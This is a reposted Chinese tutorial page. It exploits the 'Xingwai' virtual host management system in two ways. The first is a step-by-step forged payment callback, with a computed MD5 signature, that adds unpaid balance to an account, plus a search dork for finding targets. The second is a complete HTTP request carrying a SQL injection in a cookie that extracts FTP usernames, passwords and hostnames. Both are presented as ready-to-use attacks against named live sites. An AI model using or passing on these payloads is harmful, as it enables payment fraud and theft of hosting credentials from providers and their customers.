当前位置:  首页  >  服务器技术  >  Linux/unix  >  Linux教程

星外虚拟主机管理系统刷钱漏洞+注射漏洞

测试站:http:www.xiaoweio.cn注册账号,例如:test访问:http:www.xiaoweio.cnnetpayips输入你用户名以及充值金额。例如:test10元点下一步,会给你生成一个订单号。比如722978记住它参数构造:billno订单号amount充值金额date日

测试站:http://www.xiaoweio.cn/
注册账号,例如:test
访问:http://www.xiaoweio.cn/netpay/ips/
输入你用户名 以及 充值金额。
例如: test 10元
点下一步,会给你生成一个订单号。比如722978
记住它

参数构造:

billno=订单号&amount=充值金额&date=日期&succ=Y&signature=md5值

复制代码
日期 = 当前日期
充值金额 = 订单号上的金额

加入实际值:
billno=722978&amount=5&date=20100613&succ=Y&signature=990a56c327f4b60d0c4d94a880f728ec

md5值=md5(billno&amount&date&succ)


这里演示的实际md5值为:
md5(722978520100613Y)=990a56c327f4b60d0c4d94a880f728ec


提交url
http://www.xiaoweio.cn/netpay/ips/receive.asp?billno=722978&amount=5&date=20100613&succ=Y&signature=990a56c327f4b60d0c4d94a880f728ec

这样5块钱就来了。
给你们一个关键字:inurl: (netpay/alipay)



注射漏洞

POST /netpay/allbuy/receive.asp?amount=1&success=Y&sign=d3d9df7301929c5684fb52c267186b21 HTTP/1.1

Cookie: billno=1'%20or%200%3c%3e(select%20top%201%20ftpname%2bchar(124)%2bftppassword%2bchar(124)%2bhostname%20from%20FreeHost.FreeHost_Product_Host%20where%20id%20not%20in(select%20top%200%20id%20from%20FreeHost.FreeHost_Product_Host%20order%20by%20id)%20order%20by%20id)%3b--

Content-Type: application/x-www-form-urlencoded

Referer: http://www.9c2c.com/netpay/allbuy/receive.asp?amount=1&success=Y&sign=d3d9df7301929c5684fb52c267186b21

Host: www.9c2c.com

Content-Length: 7

Expect: 100-continue

Connection: Keep-Alive

吐了个 "CAO" !
扫码关注 PHP1 官方微信号
PHP1.CN | 中国最专业的PHP中文社区 | PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | PHP问答
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved PHP1.CN 第一PHP社区 版权所有